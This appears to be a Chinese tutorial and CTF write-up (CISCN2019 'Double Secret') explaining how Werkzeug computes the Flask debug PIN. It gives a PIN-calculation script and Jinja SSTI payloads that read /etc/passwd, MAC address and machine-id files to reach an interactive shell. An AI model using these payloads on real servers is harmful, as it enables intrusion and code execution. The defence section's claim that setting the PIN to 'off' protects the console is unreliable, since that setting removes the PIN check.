Flask Debug模式下的PIN码安全性分析与利用<\/h1>

一、概述<\/h2>
Flask在生产环境中开启debug模式时，会提供一个交互式shell，可以执行自定义Python代码。在较旧版本中无需输入PIN码即可执行代码，而新版本需要输入PIN码才能使用该功能。<\/p>
关键特性：<\/p>
同一台机器上多次重启Flask服务，PIN码值不变<\/li>
PIN码不是随机生成，有固定的生成算法<\/li>
通过分析生成流程可以预测或计算PIN码<\/li> <\/ul>
二、PIN码生成流程分析<\/h2>

环境要求<\/h3>
Python 2.7<\/li>
Flask 1.1.2<\/li>
Werkzeug库<\/li> <\/ul>
生成流程关键代码<\/h3>
PIN码生成主要在werkzeug\/debug\/__init__.py<\/code>文件的get_pin_and_cookie_name<\/code>函数中实现：<\/p>
def<\/span> get_pin_and_cookie_name<\/span>(app):
<\/span><\/span>    pin =<\/span> os.<\/span>environ.<\/span>get("WERKZEUG_DEBUG_PIN"<\/span>)
<\/span><\/span>    rv =<\/span> None<\/span>
<\/span><\/span>    num =<\/span> None<\/span>
<\/span><\/span>    
<\/span><\/span>    # 如果显式禁用PIN码<\/span>
<\/span><\/span>    if<\/span> pin ==<\/span> "off"<\/span>:
<\/span><\/span>        return<\/span> None<\/span>, None<\/span>
<\/span><\/span>    
<\/span><\/span>    # 如果提供了明确的PIN码<\/span>
<\/span><\/span>    if<\/span> pin is<\/span> not<\/span> None<\/span> and<\/span> pin.<\/span>replace("-"<\/span>, ""<\/span>).<\/span>isdigit():
<\/span><\/span>        if<\/span> "-"<\/span> in<\/span> pin:
<\/span><\/span>            rv =<\/span> pin
<\/span><\/span>        else<\/span>:
<\/span><\/span>            num =<\/span> pin
<\/span><\/span>    
<\/span><\/span>    modname =<\/span> getattr(app, "__module__"<\/span>, app.<\/span>__class__.<\/span>__module__)
<\/span><\/span>    
<\/span><\/span>    try<\/span>:
<\/span><\/span>        username =<\/span> getpass.<\/span>getuser()
<\/span><\/span>    except<\/span> (ImportError<\/span>, KeyError<\/span>):
<\/span><\/span>        username =<\/span> None<\/span>
<\/span><\/span>    
<\/span><\/span>    mod =<\/span> sys.<\/span>modules.<\/span>get(modname)
<\/span><\/span>    
<\/span><\/span>    probably_public_bits =<\/span> [
<\/span><\/span>        username,
<\/span><\/span>        modname,
<\/span><\/span>        getattr(app, "__name__"<\/span>, app.<\/span>__class__.<\/span>__name__),
<\/span><\/span>        getattr(mod, "__file__"<\/span>, None<\/span>),
<\/span><\/span>    ]
<\/span><\/span>    
<\/span><\/span>    private_bits =<\/span> [
<\/span><\/span>        str(uuid.<\/span>getnode()),
<\/span><\/span>        get_machine_id()
<\/span><\/span>    ]
<\/span><\/span>    
<\/span><\/span>    h =<\/span> hashlib.<\/span>md5()
<\/span><\/span>    for<\/span> bit in<\/span> chain(probably_public_bits, private_bits):
<\/span><\/span>        if<\/span> not<\/span> bit:
<\/span><\/span>            continue<\/span>
<\/span><\/span>        if<\/span> isinstance(bit, text_type):
<\/span><\/span>            bit =<\/span> bit.<\/span>encode("utf-8"<\/span>)
<\/span><\/span>        h.<\/span>update(bit)
<\/span><\/span>    h.<\/span>update(b<\/span>"cookiesalt"<\/span>)
<\/span><\/span>    cookie_name =<\/span> "__wzd"<\/span> +<\/span> h.<\/span>hexdigest()[:20<\/span>]
<\/span><\/span>    
<\/span><\/span>    if<\/span> num is<\/span> None<\/span>:
<\/span><\/span>        h.<\/span>update(b<\/span>"pinsalt"<\/span>)
<\/span><\/span>        num =<\/span> ("<\/span>%09d<\/span>"<\/span> %<\/span> int(h.<\/span>hexdigest(), 16<\/span>))[:9<\/span>]
<\/span><\/span>    
<\/span><\/span>    if<\/span> rv is<\/span> None<\/span>:
<\/span><\/span>        for<\/span> group_size in<\/span> 5<\/span>, 4<\/span>, 3<\/span>:
<\/span><\/span>            if<\/span> len(num) %<\/span> group_size ==<\/span> 0<\/span>:
<\/span><\/span>                rv =<\/span> "-"<\/span>.<\/span>join(
<\/span><\/span>                    num[x:x +<\/span> group_size].<\/span>rjust(group_size, "0"<\/span>)
<\/span><\/span>                    for<\/span> x in<\/span> range(0<\/span>, len(num), group_size)
<\/span><\/span>                )
<\/span><\/span>                break<\/span>
<\/span><\/span>        else<\/span>:
<\/span><\/span>            rv =<\/span> num
<\/span><\/span>    
<\/span><\/span>    return<\/span> rv, cookie_name
<\/span><\/span><\/code><\/pre>生成步骤解析<\/h3>

初始化变量<\/strong>：pin<\/code>、rv<\/code>、num<\/code>初始为None<\/li>
检查环境变量<\/strong>：如果设置了WERKZEUG_DEBUG_PIN<\/code>则使用预设值<\/li>
收集公开信息<\/strong>：

username<\/code>：运行Flask的用户名<\/li>
modname<\/code>：通常为flask.app<\/code><\/li>
app.__name__<\/code>：通常为Flask<\/code><\/li>
mod.__file__<\/code>：Flask app.py的绝对路径<\/li>
<\/ul>
<\/li>
收集私有信息<\/strong>：

uuid.getnode()<\/code>：网卡MAC地址的十进制表示<\/li>
get_machine_id()<\/code>：系统ID<\/li>
<\/ul>
<\/li>
MD5哈希计算<\/strong>：

将上述6个值按顺序连接<\/li>
添加salt<\/code>值cookiesalt<\/code>和pinsalt<\/code><\/li>
计算MD5哈希<\/li>
<\/ul>
<\/li>
格式化PIN码<\/strong>：

取哈希值前9位数字<\/li>
格式化为XXX-XXX-XXX<\/code>的形式<\/li>
<\/ul>
<\/li>
<\/ol>
三、关键变量获取方法<\/h2>
1. username<\/h3>

Linux<\/strong>：从\/etc\/passwd<\/code>中读取<\/li>
Windows<\/strong>：使用net user<\/code>命令查看<\/li>
<\/ul>
2. modname和app.name<\/strong><\/h3>
通常固定为：<\/p>

modname<\/code> = flask.app<\/code><\/li>
app.__name__<\/code> = Flask<\/code><\/li>
<\/ul>
3. mod.file<\/strong><\/h3>

从Flask报错页面可见<\/li>
Python 2: app.pyc<\/code><\/li>
Python 3: app.py<\/code><\/li>
示例：\/usr\/local\/lib\/python2.7\/dist-packages\/flask\/app.pyc<\/code><\/li>
<\/ul>
4. uuid.getnode() (MAC地址)<\/h3>

Linux<\/strong>：

读取\/sys\/class\/net\/eth0\/address<\/code>或\/sys\/class\/net\/ens33\/address<\/code><\/li>
转换为十进制<\/li>
<\/ul>
<\/li>
Windows<\/strong>：

ipconfig \/all<\/code>获取MAC地址<\/li>
转换为十进制<\/li>
注意：可能有多个网卡，uuid.getnode()<\/code>获取第一个匹配的<\/li>
<\/ul>
<\/li>
<\/ul>
5. get_machine_id()<\/h3>

Linux<\/strong>：

读取\/etc\/machine-id<\/code>或\/proc\/sys\/kernel\/random\/boot_id<\/code><\/li>
与\/proc\/self\/cgroup<\/code>的ID拼接<\/li>
<\/ul>
<\/li>
Windows<\/strong>：

注册表路径：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography<\/code><\/li>
键名：MachineGuid<\/code><\/li>
命令：reg query HKLM\SOFTWARE\Microsoft\Cryptography<\/code><\/li>
<\/ul>
<\/li>
<\/ul>
四、PIN码计算脚本<\/h2>
import<\/span> hashlib
<\/span><\/span>from<\/span> itertools import<\/span> chain
<\/span><\/span>
<\/span><\/span>probably_public_bits =<\/span> [
<\/span><\/span>    'username'<\/span>,          # 替换为实际用户名<\/span>
<\/span><\/span>    'flask.app'<\/span>,         # 通常固定<\/span>
<\/span><\/span>    'Flask'<\/span>,             # 通常固定<\/span>
<\/span><\/span>    '\/path\/to\/flask\/app.pyc'<\/span>  # 替换为实际路径<\/span>
<\/span><\/span>]
<\/span><\/span>
<\/span><\/span>private_bits =<\/span> [
<\/span><\/span>    'mac_address_decimal'<\/span>,  # 替换为MAC地址十进制<\/span>
<\/span><\/span>    'machine_id'<\/span>            # 替换为系统ID<\/span>
<\/span><\/span>]
<\/span><\/span>
<\/span><\/span>h =<\/span> hashlib.<\/span>md5()
<\/span><\/span>for<\/span> bit in<\/span> chain(probably_public_bits, private_bits):
<\/span><\/span>    if<\/span> not<\/span> bit:
<\/span><\/span>        continue<\/span>
<\/span><\/span>    if<\/span> isinstance(bit, str):
<\/span><\/span>        bit =<\/span> bit.<\/span>encode('utf-8'<\/span>)
<\/span><\/span>    h.<\/span>update(bit)
<\/span><\/span>h.<\/span>update(b<\/span>'cookiesalt'<\/span>)
<\/span><\/span>cookie_name =<\/span> '__wzd'<\/span> +<\/span> h.<\/span>hexdigest()[:20<\/span>]
<\/span><\/span>
<\/span><\/span>num =<\/span> None<\/span>
<\/span><\/span>if<\/span> num is<\/span> None<\/span>:
<\/span><\/span>    h.<\/span>update(b<\/span>'pinsalt'<\/span>)
<\/span><\/span>    num =<\/span> ('<\/span>%09d<\/span>'<\/span> %<\/span> int(h.<\/span>hexdigest(), 16<\/span>))[:9<\/span>]
<\/span><\/span>
<\/span><\/span>rv =<\/span> None<\/span>
<\/span><\/span>if<\/span> rv is<\/span> None<\/span>:
<\/span><\/span>    for<\/span> group_size in<\/span> 5<\/span>, 4<\/span>, 3<\/span>:
<\/span><\/span>        if<\/span> len(num) %<\/span> group_size ==<\/span> 0<\/span>:
<\/span><\/span>            rv =<\/span> '-'<\/span>.<\/span>join(
<\/span><\/span>                num[x:x +<\/span> group_size].<\/span>rjust(group_size, '0'<\/span>)
<\/span><\/span>                for<\/span> x in<\/span> range(0<\/span>, len(num), group_size))
<\/span><\/span>            break<\/span>
<\/span><\/span>    else<\/span>:
<\/span><\/span>        rv =<\/span> num
<\/span><\/span>
<\/span><\/span>print(rv)
<\/span><\/span><\/code><\/pre>五、实际利用场景<\/h2>
例题分析：[CISCN2019 华东南赛区]Double Secret<\/h3>


漏洞点<\/strong>：当\/secret?secret=<\/code>参数超过5位数时会触发debug页面<\/p>
<\/li>

信息收集<\/strong>：<\/p>

使用SSTI漏洞读取系统文件获取生成PIN所需的信息<\/li>
通过RC4加密payload绕过过滤<\/li>
<\/ul>
<\/li>

关键payload<\/strong>：<\/p>
# 获取username<\/span>
<\/span><\/span>{{''<\/span>.<\/span>__class__.<\/span>__mro__.<\/span>__getitem__(2<\/span>).<\/span>__subclasses__().<\/span>pop(40<\/span>)('\/etc\/passwd'<\/span>).<\/span>read()}}
<\/span><\/span>
<\/span><\/span># 获取MAC地址<\/span>
<\/span><\/span>{{''<\/span>.<\/span>__class__.<\/span>__mro__.<\/span>__getitem__(2<\/span>).<\/span>__subclasses__().<\/span>pop(40<\/span>)('\/sys\/class\/net\/eth0\/address'<\/span>).<\/span>read()}}
<\/span><\/span>
<\/span><\/span># 获取machine-id<\/span>
<\/span><\/span>{{''<\/span>.<\/span>__class__.<\/span>__mro__.<\/span>__getitem__(2<\/span>).<\/span>__subclasses__().<\/span>pop(40<\/span>)('\/etc\/machine-id'<\/span>).<\/span>read()}}
<\/span><\/span>
<\/span><\/span># 获取cgroup信息<\/span>
<\/span><\/span>{{''<\/span>.<\/span>__class__.<\/span>__mro__.<\/span>__getitem__(2<\/span>).<\/span>__subclasses__().<\/span>pop(40<\/span>)('\/proc\/self\/cgroup'<\/span>).<\/span>read()}}
<\/span><\/span><\/code><\/pre><\/li>

计算PIN码<\/strong>：收集所有必要信息后使用上述脚本计算<\/p>
<\/li>
<\/ol>
六、防御措施<\/h2>


生产环境禁用debug模式<\/strong>：<\/p>
app.<\/span>run(debug=<\/span>False<\/span>)
<\/span><\/span><\/code><\/pre><\/li>

设置复杂PIN码<\/strong>：<\/p>
export WERKZEUG_DEBUG_PIN=<\/span>"your-complex-pin"<\/span>
<\/span><\/span><\/code><\/pre><\/li>

完全禁用PIN码<\/strong>：<\/p>
export WERKZEUG_DEBUG_PIN=<\/span>"off"<\/span>
<\/span><\/span><\/code><\/pre><\/li>

使用最新版本<\/strong>：保持Flask和Werkzeug更新以获取安全修复<\/p>
<\/li>
<\/ol>
七、总结<\/h2>
Flask debug模式的PIN码安全性依赖于多个系统信息的组合，通过分析可以：<\/p>

理解PIN码生成机制<\/li>
在获得足够系统信息时计算PIN码<\/li>
利用SSTI等漏洞收集必要信息<\/li>
最终获取交互式shell权限<\/li>
<\/ol>
这种特性在渗透测试中可能被用作后门，因此生产环境必须严格禁用debug模式。<\/p>